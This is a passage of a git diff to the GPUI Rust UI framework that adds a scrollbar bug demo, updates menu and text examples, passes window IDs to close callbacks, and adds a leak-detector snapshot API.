+ }; + + let track_space = viewport_height - thumb_height; + let thumb_top = track_space * raw_fraction; + + let bug_detected = raw_fraction > 1.0; + + div() + .size_full() + .bg(rgb(0xFFFFFF)) + .flex() + .flex_col() + .p_4() + .gap_2() + .child( + div() + .text_sm() + .flex() + .flex_col() + .gap_1() + .child(format!( + "offset: {:.0} / max: {:.0} | fraction: {:.3}", + current_offset.as_f32(), + max_offset.as_f32(), + raw_fraction, + )) + .child( + div() + .text_color(if bug_detected { + rgb(0xCC0000) + } else { + rgb(0x008800) + }) + .child(if bug_detected { + format!( + "BUG: fraction is {:.3} (> 1.0) — thumb is off-track!", + raw_fraction + ) + } else { + "OK: fraction <= 1.0 — thumb is within track.".to_string() + }), + ), + ) + .child( + div() + .flex_1() + .flex() + .flex_row() + .overflow_hidden() + .border_1() + .border_color(rgb(0xCCCCCC)) + .rounded_sm() + .child( + list(self.list_state.clone(), |index, _window, _cx| { + let height = px(30. + (index % 5) as f32 * 10.); + div() + .h(height) + .w_full() + .flex() + .items_center() + .px_3() + .border_b_1() + .border_color(rgb(0xEEEEEE)) + .bg(if index % 2 == 0 { + rgb(0xFAFAFA) + } else { + rgb(0xFFFFFF) + }) + .text_sm() + .child(format!("Item {index}")) + .into_any() + }) + .flex_1(), + ) + // Scrollbar track + .child( + div() + .w(px(SCROLLBAR_WIDTH)) + .h_full() + .flex_shrink_0() + .bg(rgb(0xE0E0E0)) + .relative() + .child( + // Thumb — position is unclamped to expose the bug + div() + .absolute() + .top(thumb_top) + .w_full() + .h(thumb_height) + .bg(if bug_detected { + rgb(0xCC0000) + } else { + rgb(0x888888) + }) + .rounded_sm(), + ), + ), + ) + } +} + +fn run_example() { + application().run(|cx: &mut App| { + let bounds = Bounds::centered(None, size(px(400.), px(500.)), cx); + cx.open_window( + WindowOptions { + focus: true, + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + |_, cx| cx.new(|_| BottomListDemo::new()), + ) + .unwrap(); + cx.activate(true); + }); +} 
+ +#[cfg(not(target_family = "wasm"))] +fn main() { + run_example(); +} + +#[cfg(target_family = "wasm")] +#[wasm_bindgen::prelude::wasm_bindgen(start)] +pub fn start() { + gpui_platform::web_init(); + run_example(); +} diff --git a/crates/gpui/examples/on_window_close_quit.rs b/crates/gpui/examples/on_window_close_quit.rs index e71a142d991c87ccbccb9c078fdb50d1fa3dba49..347401c6d924f146fec539c862878d21c4b18e67 100644 --- a/crates/gpui/examples/on_window_close_quit.rs +++ b/crates/gpui/examples/on_window_close_quit.rs @@ -42,7 +42,7 @@ fn run_example() { let mut bounds = Bounds::centered(None, size(px(500.), px(500.0)), cx); cx.bind_keys([KeyBinding::new("cmd-w", CloseWindow, None)]); - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { if cx.windows().is_empty() { cx.quit(); } diff --git a/crates/gpui/examples/painting.rs b/crates/gpui/examples/painting.rs index 18ef6b9fa3741297ddfebc1b5df3ea4a3594fc05..11c3b333717c6b816cdf2f7d5170ceae0cfd1b1f 100644 --- a/crates/gpui/examples/painting.rs +++ b/crates/gpui/examples/painting.rs @@ -457,7 +457,7 @@ fn run_example() { |window, cx| cx.new(|cx| PaintingViewer::new(window, cx)), ) .unwrap(); - cx.on_window_closed(|cx| { + cx.on_window_closed(|cx, _window_id| { cx.quit(); }) .detach(); diff --git a/crates/gpui/examples/popover.rs b/crates/gpui/examples/popover.rs index bd112b0e69a62c1303e9d90945e24cfb3f659b82..9d5f84a1f43462e6e49ec5b0984dbd7b1c50230a 100644 --- a/crates/gpui/examples/popover.rs +++ b/crates/gpui/examples/popover.rs @@ -56,21 +56,23 @@ impl HelloWorld { })) .when(self.secondary_open, |this| { this.child( - // GPUI can't support deferred here yet, - // it was inside another deferred element. 
- anchored() - .anchor(Corner::TopLeft) - .snap_to_window_with_margin(px(8.)) - .child( - popover() - .child("This is second level Popover") - .bg(gpui::white()) - .border_color(gpui::blue()) - .on_mouse_down_out(cx.listener(|this, _, _, cx| { - this.secondary_open = false; - cx.notify(); - })), - ), + // Now GPUI supports nested deferred! + deferred( + anchored() + .anchor(Corner::TopLeft) + .snap_to_window_with_margin(px(8.)) + .child( + popover() + .child("This is second level Popover with nested deferred!") + .bg(gpui::white()) + .border_color(gpui::blue()) + .on_mouse_down_out(cx.listener(|this, _, _, cx| { + this.secondary_open = false; + cx.notify(); + })), + ), + ) + .priority(2), ) }) } diff --git a/crates/gpui/examples/set_menus.rs b/crates/gpui/examples/set_menus.rs index 683793c35fd4d356c068a3c36b041fba1dbc5ecf..a07f3c36abcc86390595c73f9c6eae55c3c370ef 100644 --- a/crates/gpui/examples/set_menus.rs +++ b/crates/gpui/examples/set_menus.rs @@ -2,7 +2,7 @@ use gpui::{ App, Context, Global, Menu, MenuItem, SharedString, SystemMenuType, Window, WindowOptions, - actions, div, prelude::*, rgb, + actions, div, prelude::*, }; use gpui_platform::application; @@ -12,12 +12,12 @@ impl Render for SetMenus { fn render(&mut self, _window: &mut Window, _cx: &mut Context) -> impl IntoElement { div() .flex() - .bg(rgb(0x2e7d32)) + .bg(gpui::white()) .size_full() .justify_center() .items_center() .text_xl() - .text_color(rgb(0xffffff)) + .text_color(gpui::black()) .child("Set Menus Example") } } @@ -28,7 +28,8 @@ fn run_example() { // Bring the menu bar to the foreground (so you can see the menu bar) cx.activate(true); - // Register the `quit` function so it can be referenced by the `MenuItem::action` in the menu bar + // Register the `quit` function so it can be referenced + // by the `MenuItem::action` in the menu bar cx.on_action(quit); cx.on_action(toggle_check); // Add menu items @@ -91,19 +92,24 @@ impl Global for AppState {} fn set_app_menus(cx: &mut App) { let 
app_state = cx.global::(); - cx.set_menus(vec![Menu { - name: "set_menus".into(), - items: vec![ - MenuItem::os_submenu("Services", SystemMenuType::Services), - MenuItem::separator(), - MenuItem::action(ViewMode::List, ToggleCheck) - .checked(app_state.view_mode == ViewMode::List), - MenuItem::action(ViewMode::Grid, ToggleCheck) - .checked(app_state.view_mode == ViewMode::Grid), - MenuItem::separator(), - MenuItem::action("Quit", Quit), - ], - }]); + cx.set_menus([Menu::new("set_menus").items([ + MenuItem::os_submenu("Services", SystemMenuType::Services), + MenuItem::separator(), + MenuItem::action("Disabled Item", gpui::NoAction).disabled(true), + MenuItem::submenu(Menu::new("Disabled Submenu").disabled(true)), + MenuItem::separator(), + MenuItem::action("List Mode", ToggleCheck).checked(app_state.view_mode == ViewMode::List), + MenuItem::submenu( + Menu::new("Mode").items([ + MenuItem::action(ViewMode::List, ToggleCheck) + .checked(app_state.view_mode == ViewMode::List), + MenuItem::action(ViewMode::Grid, ToggleCheck) + .checked(app_state.view_mode == ViewMode::Grid), + ]), + ), + MenuItem::separator(), + MenuItem::action("Quit", Quit), + ])]); } // Associate actions using the `actions!` macro (or `Action` derive macro) @@ -111,7 +117,7 @@ actions!(set_menus, [Quit, ToggleCheck]); // Define the quit function that is registered with the App fn quit(_: &Quit, cx: &mut App) { - println!("Gracefully quitting the application . . 
."); + println!("Gracefully quitting the application..."); cx.quit(); } diff --git a/crates/gpui/examples/text.rs b/crates/gpui/examples/text.rs index acaf4fe83a49726e0a3c641ca577bf75c54e224d..418ebaabf69da8717dcdd6aa5960abd986b6d05d 100644 --- a/crates/gpui/examples/text.rs +++ b/crates/gpui/examples/text.rs @@ -1,6 +1,7 @@ #![cfg_attr(target_family = "wasm", no_main)] use std::{ + borrow::Cow, ops::{Deref, DerefMut}, sync::Arc, }; @@ -204,7 +205,7 @@ impl RenderOnce for CharacterGrid { "❮", "<=", "!=", "==", "--", "++", "=>", "->", "🏀", "🎊", "😍", "❤️", "👍", "👎", ]; - let columns = 11; + let columns = 20; let rows = characters.len().div_ceil(columns); let grid_rows = (0..rows).map(|row_idx| { @@ -238,6 +239,7 @@ impl RenderOnce for CharacterGrid { struct TextExample { next_id: usize, + font_family: SharedString, } impl TextExample { @@ -245,8 +247,33 @@ impl TextExample { self.next_id += 1; self.next_id } + + fn button( + text: &str, + cx: &mut Context, + on_click: impl Fn(&mut Self, &mut Context) + 'static, + ) -> impl IntoElement { + div() + .id(text.to_string()) + .flex_none() + .child(text.to_string()) + .bg(gpui::black()) + .text_color(gpui::white()) + .active(|this| this.opacity(0.8)) + .px_3() + .py_1() + .on_click(cx.listener(move |this, _, _, cx| on_click(this, cx))) + } } +const FONT_FAMILIES: [&str; 5] = [ + ".ZedMono", + ".SystemUIFont", + "Menlo", + "Monaco", + "Courier New", +]; + impl Render for TextExample { fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { let tcx = cx.text_context(); @@ -265,7 +292,26 @@ impl Render for TextExample { let step_up_6 = step_up_5 * type_scale; div() + .font_family(self.font_family.clone()) .size_full() + .child( + div() + .bg(gpui::white()) + .border_b_1() + .border_color(gpui::black()) + .p_3() + .flex() + .child(Self::button(&self.font_family, cx, |this, cx| { + let new_family = FONT_FAMILIES + .iter() + .position(|f| *f == this.font_family.as_str()) + .map(|idx| FONT_FAMILIES[(idx 
+ 1) % FONT_FAMILIES.len()]) + .unwrap_or(FONT_FAMILIES[0]); + + this.font_family = SharedString::new(new_family); + cx.notify(); + })), + ) .child( div() .id("text-example") @@ -304,9 +350,19 @@ fn run_example() { application().run(|cx: &mut App| { cx.set_menus(vec![Menu { name: "GPUI Typography".into(), + disabled: false, items: vec![], }]); + let fonts = [include_bytes!( + "../../../assets/fonts/lilex/Lilex-Regular.ttf" + )] + .iter() + .map(|b| Cow::Borrowed(&b[..])) + .collect(); + + _ = cx.text_system().add_fonts(fonts); + cx.init_colors(); cx.set_global(GlobalTextContext(Arc::new(TextContext::default()))); @@ -323,7 +379,12 @@ fn run_example() { ))), ..Default::default() }, - |_window, cx| cx.new(|_cx| TextExample { next_id: 0 }), + |_window, cx| { + cx.new(|_cx| TextExample { + next_id: 0, + font_family: ".ZedMono".into(), + }) + }, ) .unwrap(); diff --git a/crates/gpui/src/action.rs b/crates/gpui/src/action.rs index 1ab619ff171dbeab8a0843393874e7184320e0db..a47ebe69f0d825c6e2c347ea2881180cb5b04573 100644 --- a/crates/gpui/src/action.rs +++ b/crates/gpui/src/action.rs @@ -1,7 +1,7 @@ use anyhow::{Context as _, Result}; use collections::HashMap; pub use gpui_macros::Action; -pub use no_action::{NoAction, is_no_action}; +pub use no_action::{NoAction, Unbind, is_no_action, is_unbind}; use serde_json::json; use std::{ any::{Any, TypeId}, @@ -290,19 +290,6 @@ impl ActionRegistry { } } - #[cfg(test)] - pub(crate) fn load_action(&mut self) { - self.insert_action(MacroActionData { - name: A::name_for_type(), - type_id: TypeId::of::
(), - build: A::build, - json_schema: A::action_json_schema, - deprecated_aliases: A::deprecated_aliases(), - deprecation_message: A::deprecation_message(), - documentation: A::documentation(), - }); - } - fn insert_action(&mut self, action: MacroActionData) { let name = action.name; if self.by_name.contains_key(name) { @@ -432,7 +419,8 @@ pub fn generate_list_of_all_registered_actions() -> impl Iterator bool { - action.as_any().type_id() == (NoAction {}).type_id() + action.as_any().is::() + } + + /// Returns whether or not this action represents an unbind marker. + pub fn is_unbind(action: &dyn gpui::Action) -> bool { + action.as_any().is::() } } diff --git a/crates/gpui/src/app.rs b/crates/gpui/src/app.rs index 1bd5cd6b3c6a74ee840ac93b08554a82b1f050fa..3453364a20ebf59bef6940656f79cbfdaf732c22 100644 --- a/crates/gpui/src/app.rs +++ b/crates/gpui/src/app.rs @@ -27,9 +27,13 @@ use collections::{FxHashMap, FxHashSet, HashMap, VecDeque}; pub use context::*; pub use entity_map::*; use gpui_util::{ResultExt, debug_panic}; +#[cfg(any(test, feature = "test-support"))] +pub use headless_app_context::*; use http_client::{HttpClient, Url}; use smallvec::SmallVec; #[cfg(any(test, feature = "test-support"))] +pub use test_app::*; +#[cfg(any(test, feature = "test-support"))] pub use test_context::*; #[cfg(all(target_os = "macos", any(test, feature = "test-support")))] pub use visual_test_context::*; @@ -45,7 +49,8 @@ use crate::{ PlatformKeyboardMapper, Point, Priority, PromptBuilder, PromptButton, PromptHandle, PromptLevel, Render, RenderImage, RenderablePromptHandle, Reservation, ScreenCaptureSource, SharedString, SubscriberSet, Subscription, SvgRenderer, Task, TextRenderingMode, TextSystem, - ThermalState, Window, WindowAppearance, WindowHandle, WindowId, WindowInvalidator, + ThermalState, Window, WindowAppearance, WindowButtonLayout, WindowHandle, WindowId, + WindowInvalidator, colors::{Colors, GlobalColors}, hash, init_app_menus, }; @@ -54,6 +59,10 @@ mod async_context; 
mod context; mod entity_map; #[cfg(any(test, feature = "test-support"))] +mod headless_app_context; +#[cfg(any(test, feature = "test-support"))] +mod test_app; +#[cfg(any(test, feature = "test-support"))] mod test_context; #[cfg(all(target_os = "macos", any(test, feature = "test-support")))] mod visual_test_context; @@ -232,7 +241,7 @@ type Listener = Box bool + 'static>; pub(crate) type KeystrokeObserver = Box bool + 'static>; type QuitHandler = Box LocalBoxFuture<'static, ()> + 'static>; -type WindowClosedHandler = Box; +type WindowClosedHandler = Box; type ReleaseListener = Box; type NewEntityListener = Box, &mut App) + 'static>; @@ -571,21 +580,13 @@ impl GpuiMode { pub struct App { pub(crate) this: Weak, pub(crate) platform: Rc, - pub(crate) mode: GpuiMode, text_system: Arc, - flushing_effects: bool, - pending_updates: usize, + pub(crate) actions: Rc, pub(crate) active_drag: Option, pub(crate) background_executor: BackgroundExecutor, pub(crate) foreground_executor: ForegroundExecutor, - pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box>, - asset_source: Arc, - pub(crate) svg_renderer: SvgRenderer, - http_client: Arc, - pub(crate) globals_by_type: FxHashMap>, pub(crate) entities: EntityMap, - pub(crate) window_update_stack: Vec, pub(crate) new_entity_observers: SubscriberSet, pub(crate) windows: SlotMap>>, pub(crate) window_handles: FxHashMap, @@ -596,10 +597,8 @@ pub struct App { pub(crate) global_action_listeners: FxHashMap>>, pending_effects: VecDeque, - pub(crate) pending_notifications: FxHashSet, - pub(crate) pending_global_notifications: FxHashSet, + pub(crate) observers: SubscriberSet, - // TypeId is the type of the event that the listener callback expects pub(crate) event_listeners: SubscriberSet, pub(crate) keystroke_observers: SubscriberSet<(), KeystrokeObserver>, pub(crate) keystroke_interceptors: SubscriberSet<(), KeystrokeObserver>, @@ -609,8 +608,30 @@ pub struct App { pub(crate) global_observers: SubscriberSet, pub(crate) quit_observers: 
SubscriberSet<(), QuitHandler>, pub(crate) restart_observers: SubscriberSet<(), Handler>, - pub(crate) restart_path: Option, pub(crate) window_closed_observers: SubscriberSet<(), WindowClosedHandler>, + + /// Per-App element arena. This isolates element allocations between different + /// App instances (important for tests where multiple Apps run concurrently). + pub(crate) element_arena: RefCell, + /// Per-App event arena. + pub(crate) event_arena: Arena, + + // Drop globals last. We need to ensure all tasks owned by entities and + // callbacks are marked cancelled at this point as this will also shutdown + // the tokio runtime. As any task attempting to spawn a blocking tokio task, + // might panic. + pub(crate) globals_by_type: FxHashMap>, + + // assets + pub(crate) loading_assets: FxHashMap<(TypeId, u64), Box>, + asset_source: Arc, + pub(crate) svg_renderer: SvgRenderer, + http_client: Arc, + + // below is plain data, the drop order is insignificant here + pub(crate) pending_notifications: FxHashSet, + pub(crate) pending_global_notifications: FxHashSet, + pub(crate) restart_path: Option, pub(crate) layout_id_buffer: Vec, // We recycle this memory across layout requests. pub(crate) propagate_event: bool, pub(crate) prompt_builder: Option, @@ -624,13 +645,18 @@ pub struct App { #[cfg(any(test, feature = "test-support", debug_assertions))] pub(crate) name: Option<&'static str>, pub(crate) text_rendering_mode: Rc>, + + pub(crate) window_update_stack: Vec, + pub(crate) mode: GpuiMode, + flushing_effects: bool, + pending_updates: usize, quit_mode: QuitMode, quitting: bool, - /// Per-App element arena. This isolates element allocations between different - /// App instances (important for tests where multiple Apps run concurrently). - pub(crate) element_arena: RefCell, - /// Per-App event arena. - pub(crate) event_arena: Arena, + + // We need to ensure the leak detector drops last, after all tasks, callbacks and things have been dropped. 
+ // Otherwise it may report false positives. + #[cfg(any(test, feature = "leak-detection"))] + _ref_counts: Arc>, } impl App { @@ -652,6 +678,9 @@ impl App { let keyboard_layout = platform.keyboard_layout(); let keyboard_mapper = platform.keyboard_mapper(); + #[cfg(any(test, feature = "leak-detection"))] + let _ref_counts = entities.ref_counts_drop_handle(); + let app = Rc::new_cyclic(|this| AppCell { app: RefCell::new(App { this: this.clone(), @@ -711,6 +740,9 @@ impl App { name: None, element_arena: RefCell::new(Arena::new(1024 * 1024)), event_arena: Arena::new(1024 * 1024), + + #[cfg(any(test, feature = "leak-detection"))] + _ref_counts, }), }); @@ -744,15 +776,48 @@ impl App { })); platform.on_quit(Box::new({ - let cx = app.clone(); + let cx = Rc::downgrade(&app); move || { - cx.borrow_mut().shutdown(); + if let Some(cx) = cx.upgrade() { + cx.borrow_mut().shutdown(); + } } })); app } + #[doc(hidden)] + pub fn ref_counts_drop_handle(&self) -> impl Sized + use<> { + self.entities.ref_counts_drop_handle() + } + + /// Captures a snapshot of all entities that currently have alive handles. + /// + /// The returned [`LeakDetectorSnapshot`] can later be passed to + /// [`assert_no_new_leaks`](Self::assert_no_new_leaks) to verify that no + /// entities created after the snapshot are still alive. + #[cfg(any(test, feature = "leak-detection"))] + pub fn leak_detector_snapshot(&self) -> LeakDetectorSnapshot { + self.entities.leak_detector_snapshot() + } + + /// Asserts that no entities created after `snapshot` still have alive handles. + /// + /// Entities that were already tracked at the time of the snapshot are ignored, + /// even if they still have handles. Only *new* entities (those whose + /// `EntityId` was not present in the snapshot) are considered leaks. + /// + /// # Panics + /// + /// Panics if any new entity handles exist. 
The panic message lists every + /// leaked entity with its type name, and includes allocation-site backtraces + /// when `LEAK_BACKTRACE` is set. + #[cfg(any(test, feature = "leak-detection"))] + pub fn assert_no_new_leaks(&self, snapshot: &LeakDetectorSnapshot) { + self.entities.assert_no_new_leaks(snapshot) + } + /// Quit the application gracefully. Handlers registered with [`Context::on_app_quit`] /// will be given 100ms to complete before exiting. pub fn shutdown(&mut self) { @@ -1113,6 +1178,11 @@ impl App { self.platform.window_appearance() } + /// Returns the window button layout configuration when supported. + pub fn button_layout(&self) -> Option { + self.platform.button_layout() + } + /// Reads data from the platform clipboard. pub fn read_from_clipboard(&self) -> Option { self.platform.read_from_clipboard() @@ -1497,7 +1567,7 @@ impl App { cx.windows.remove(id); cx.window_closed_observers.clone().retain(&(), |callback| { - callback(cx); + callback(cx, id); true }); @@ -1971,7 +2041,10 @@ impl App { /// Register a callback to be invoked when a window is closed /// The window is no longer accessible at the point this callback is invoked. - pub fn on_window_closed(&self, mut on_closed: impl FnMut(&mut App) + 'static) -> Subscription { + pub fn on_window_closed( + &self, + mut on_closed: impl FnMut(&mut App, WindowId) + 'static, + ) -> Subscription { let (subscription, activate) = self.window_closed_observers.insert((), Box::new(on_closed)); activate(); subscription @@ -2008,7 +2081,8 @@ impl App { } /// Sets the menu bar for this application. This will replace any existing menu bar. 
- pub fn set_menus(&self, menus: Vec) { + pub fn set_menus(&self, menus: impl IntoIterator) { + let menus: Vec = menus.into_iter().collect(); self.platform.set_menus(menus, &self.keymap.borrow()); } @@ -2286,13 +2360,12 @@ impl AppContext for App { let entity = build_entity(&mut Context::new_context(cx, slot.downgrade())); cx.push_effect(Effect::EntityCreated { - entity: handle.clone().into_any(), + entity: handle.into_any(), tid: TypeId::of::(), window: cx.window_update_stack.last().cloned(), }); - cx.entities.insert(slot, entity); - handle + cx.entities.insert(slot, entity) }) } @@ -2582,13 +2655,6 @@ impl<'a, T> Drop for GpuiBorrow<'a, T> { } } -impl Drop for App { - fn drop(&mut self) { - self.foreground_executor.close(); - self.background_executor.close(); - } -} - #[cfg(test)] mod test { use std::{cell::RefCell, rc::Rc}; diff --git a/crates/gpui/src/app/async_context.rs b/crates/gpui/src/app/async_context.rs index ccd39dda89003cf90d51fae43102a565b2136dc2..e2fd203c78364a4d096f9792dcea7e6f7b8113ea 100644 --- a/crates/gpui/src/app/async_context.rs +++ b/crates/gpui/src/app/async_context.rs @@ -4,7 +4,7 @@ use crate::{ PromptLevel, Render, Reservation, Result, Subscription, Task, VisualContext, Window, WindowHandle, }; -use anyhow::Context as _; +use anyhow::{Context as _, bail}; use derive_more::{Deref, DerefMut}; use futures::channel::oneshot; use futures::future::FutureExt; @@ -88,6 +88,9 @@ impl AppContext for AsyncApp { { let app = self.app.upgrade().context("app was released")?; let mut lock = app.try_borrow_mut()?; + if lock.quitting { + bail!("app is quitting"); + } lock.update_window(window, f) } @@ -101,6 +104,9 @@ impl AppContext for AsyncApp { { let app = self.app.upgrade().context("app was released")?; let lock = app.borrow(); + if lock.quitting { + bail!("app is quitting"); + } lock.read_window(window, read) } @@ -174,6 +180,9 @@ impl AsyncApp { { let app = self.app(); let mut lock = app.borrow_mut(); + if lock.quitting { + bail!("app is quitting"); 
+ } lock.open_window(options, build_root_view) } @@ -211,6 +220,9 @@ impl AsyncApp { pub fn try_read_global(&self, read: impl FnOnce(&G, &App) -> R) -> Option { let app = self.app(); let app = app.borrow_mut(); + if app.quitting { + return None; + } Some(read(app.try_global()?, &app)) } diff --git a/crates/gpui/src/app/context.rs b/crates/gpui/src/app/context.rs index c30a76bd9c8861d4d5b4d9dc4b5893ffeb2eb4b8..c2c74a0d57c8f0abff26ff0d19f6ef4de9e95244 100644 --- a/crates/gpui/src/app/context.rs +++ b/crates/gpui/src/app/context.rs @@ -479,6 +479,24 @@ impl<'a, T: 'static> Context<'a, T> { subscription } + /// Registers a callback to be invoked when the window button layout changes. + pub fn observe_button_layout_changed( + &self, + window: &mut Window, + mut callback: impl FnMut(&mut T, &mut Window, &mut Context) + 'static, + ) -> Subscription { + let view = self.weak_entity(); + let (subscription, activate) = window.button_layout_observers.insert( + (), + Box::new(move |window, cx| { + view.update(cx, |view, cx| callback(view, window, cx)) + .is_ok() + }), + ); + activate(); + subscription + } + /// Register a callback to be invoked when a keystroke is received by the application /// in any window. Note that this fires after all other action and event mechanisms have resolved /// and that this API will not be invoked if the event's propagation is stopped. 
diff --git a/crates/gpui/src/app/entity_map.rs b/crates/gpui/src/app/entity_map.rs index b8d9e82680eb6978d073e3e51c420cef9f1f61ec..cc4eaee492618812f1ee361d549b5e0052dafc68 100644 --- a/crates/gpui/src/app/entity_map.rs +++ b/crates/gpui/src/app/entity_map.rs @@ -59,7 +59,8 @@ pub(crate) struct EntityMap { ref_counts: Arc>, } -struct EntityRefCounts { +#[doc(hidden)] +pub(crate) struct EntityRefCounts { counts: SlotMap, dropped_entity_ids: Vec, #[cfg(any(test, feature = "leak-detection"))] @@ -83,6 +84,32 @@ impl EntityMap { } } + #[doc(hidden)] + pub fn ref_counts_drop_handle(&self) -> Arc> { + self.ref_counts.clone() + } + + /// Captures a snapshot of all entities that currently have alive handles. + /// + /// The returned [`LeakDetectorSnapshot`] can later be passed to + /// [`assert_no_new_leaks`](Self::assert_no_new_leaks) to verify that no + /// entities created after the snapshot are still alive. + #[cfg(any(test, feature = "leak-detection"))] + pub fn leak_detector_snapshot(&self) -> LeakDetectorSnapshot { + self.ref_counts.read().leak_detector.snapshot() + } + + /// Asserts that no entities created after `snapshot` still have alive handles. + /// + /// See [`LeakDetector::assert_no_new_leaks`] for details. + #[cfg(any(test, feature = "leak-detection"))] + pub fn assert_no_new_leaks(&self, snapshot: &LeakDetectorSnapshot) { + self.ref_counts + .read() + .leak_detector + .assert_no_new_leaks(snapshot) + } + /// Reserve a slot for an entity, which you can subsequently use with `insert`. 
pub fn reserve(&self) -> Slot { let id = self.ref_counts.write().counts.insert(1.into()); @@ -225,7 +252,12 @@ pub struct AnyEntity { } impl AnyEntity { - fn new(id: EntityId, entity_type: TypeId, entity_map: Weak>) -> Self { + fn new( + id: EntityId, + entity_type: TypeId, + entity_map: Weak>, + #[cfg(any(test, feature = "leak-detection"))] type_name: &'static str, + ) -> Self { Self { entity_id: id, entity_type, @@ -236,7 +268,7 @@ impl AnyEntity { .unwrap() .write() .leak_detector - .handle_created(id), + .handle_created(id, Some(type_name)), entity_map, } } @@ -299,7 +331,7 @@ impl Clone for AnyEntity { .unwrap() .write() .leak_detector - .handle_created(self.entity_id), + .handle_created(self.entity_id, None), } } } @@ -395,7 +427,13 @@ impl Entity { T: 'static, { Self { - any_entity: AnyEntity::new(id, TypeId::of::(), entity_map), + any_entity: AnyEntity::new( + id, + TypeId::of::(), + entity_map, + #[cfg(any(test, feature = "leak-detection"))] + std::any::type_name::(), + ), entity_type: PhantomData, } } @@ -574,7 +612,7 @@ impl AnyWeakEntity { .unwrap() .write() .leak_detector - .handle_created(self.entity_id), + .handle_created(self.entity_id, None), }) } @@ -856,6 +894,9 @@ pub(crate) struct HandleId { /// created, all participating strong entities in this cycle will effectively /// leak as they cannot be released anymore. /// +/// Cycles can also happen if an entity owns a task or subscription that it +/// itself owns a strong reference to the entity again. +/// /// # Usage /// /// You can use `WeakEntity::assert_released` or `AnyWeakEntity::assert_released` @@ -881,7 +922,7 @@ pub(crate) struct HandleId { /// ``` /// /// This will capture and display backtraces for each leaked handle, helping you -/// identify where handles were created but not released. +/// identify where leaked handles were created. 
/// /// # How It Works /// @@ -892,7 +933,23 @@ pub(crate) struct HandleId { #[cfg(any(test, feature = "leak-detection"))] pub(crate) struct LeakDetector { next_handle_id: u64, - entity_handles: HashMap>>, + entity_handles: HashMap, +} + +/// A snapshot of the set of alive entities at a point in time. +/// +/// Created by [`LeakDetector::snapshot`]. Can later be passed to +/// [`LeakDetector::assert_no_new_leaks`] to verify that no new entity +/// handles remain between the snapshot and the current state. +#[cfg(any(test, feature = "leak-detection"))] +pub struct LeakDetectorSnapshot { + entity_ids: collections::HashSet, +} + +#[cfg(any(test, feature = "leak-detection"))] +struct EntityLeakData { + handles: HashMap>, + type_name: &'static str, } #[cfg(any(test, feature = "leak-detection"))] @@ -903,11 +960,21 @@ impl LeakDetector { /// the handle is dropped. If `LEAK_BACKTRACE` is set, captures a backtrace /// at the allocation site. #[track_caller] - pub fn handle_created(&mut self, entity_id: EntityId) -> HandleId { + pub fn handle_created( + &mut self, + entity_id: EntityId, + type_name: Option<&'static str>, + ) -> HandleId { let id = gpui_util::post_inc(&mut self.next_handle_id); let handle_id = HandleId { id }; - let handles = self.entity_handles.entry(entity_id).or_default(); - handles.insert( + let handles = self + .entity_handles + .entry(entity_id) + .or_insert_with(|| EntityLeakData { + handles: HashMap::default(), + type_name: type_name.unwrap_or(""), + }); + handles.handles.insert( handle_id, LEAK_BACKTRACE.then(backtrace::Backtrace::new_unresolved), ); @@ -919,8 +986,14 @@ impl LeakDetector { /// This removes the handle from tracking. The `handle_id` should be the same /// one returned by `handle_created` when the handle was allocated. 
pub fn handle_released(&mut self, entity_id: EntityId, handle_id: HandleId) { - let handles = self.entity_handles.entry(entity_id).or_default(); - handles.remove(&handle_id); + if let std::collections::hash_map::Entry::Occupied(mut data) = + self.entity_handles.entry(entity_id) + { + data.get_mut().handles.remove(&handle_id); + if data.get().handles.is_empty() { + data.remove(); + } + } } /// Asserts that all handles to the given entity have been released. @@ -932,12 +1005,13 @@ impl LeakDetector { /// otherwise it suggests setting the environment variable to get more info. pub fn assert_released(&mut self, entity_id: EntityId) { use std::fmt::Write as _; - let handles = self.entity_handles.entry(entity_id).or_default(); - if !handles.is_empty() { + + if let Some(data) = self.entity_handles.remove(&entity_id) { let mut out = String::new(); - for backtrace in handles.values_mut() { - if let Some(mut backtrace) = backtrace.take() { + for (_, backtrace) in data.handles { + if let Some(mut backtrace) = backtrace { backtrace.resolve(); + let backtrace = BacktraceFormatter(backtrace); writeln!(out, "Leaked handle:\n{:?}", backtrace).unwrap(); } else { writeln!( @@ -947,11 +1021,168 @@ impl LeakDetector { .unwrap(); } } - panic!("{out}"); + panic!("Handles for {} leaked:\n{out}", data.type_name); + } + } + + /// Captures a snapshot of all entity IDs that currently have alive handles. + /// + /// The returned [`LeakDetectorSnapshot`] can later be passed to + /// [`assert_no_new_leaks`](Self::assert_no_new_leaks) to verify that no + /// entities created after the snapshot are still alive. + pub fn snapshot(&self) -> LeakDetectorSnapshot { + LeakDetectorSnapshot { + entity_ids: self.entity_handles.keys().copied().collect(), + } + } + + /// Asserts that no entities created after `snapshot` still have alive handles. + /// + /// Entities that were already tracked at the time of the snapshot are ignored, + /// even if they still have handles. 
Only *new* entities (those whose + /// `EntityId` was not present in the snapshot) are considered leaks. + /// + /// # Panics + /// + /// Panics if any new entity handles exist. The panic message lists every + /// leaked entity with its type name, and includes allocation-site backtraces + /// when `LEAK_BACKTRACE` is set. + pub fn assert_no_new_leaks(&self, snapshot: &LeakDetectorSnapshot) { + use std::fmt::Write as _; + + let mut out = String::new(); + for (entity_id, data) in &self.entity_handles { + if snapshot.entity_ids.contains(entity_id) { + continue; + } + for (_, backtrace) in &data.handles { + if let Some(backtrace) = backtrace { + let mut backtrace = backtrace.clone(); + backtrace.resolve(); + let backtrace = BacktraceFormatter(backtrace); + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}):\n{:?}", + data.type_name, backtrace + ) + .unwrap(); + } else { + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}): (export LEAK_BACKTRACE to find allocation site)", + data.type_name + ) + .unwrap(); + } + } + } + + if !out.is_empty() { + panic!("New entity leaks detected since snapshot:\n{out}"); } } } +#[cfg(any(test, feature = "leak-detection"))] +impl Drop for LeakDetector { + fn drop(&mut self) { + use std::fmt::Write; + + if self.entity_handles.is_empty() || std::thread::panicking() { + return; + } + + let mut out = String::new(); + for (entity_id, data) in self.entity_handles.drain() { + for (_handle, backtrace) in data.handles { + if let Some(mut backtrace) = backtrace { + backtrace.resolve(); + let backtrace = BacktraceFormatter(backtrace); + writeln!( + out, + "Leaked handle for entity {} ({entity_id:?}):\n{:?}", + data.type_name, backtrace + ) + .unwrap(); + } else { + 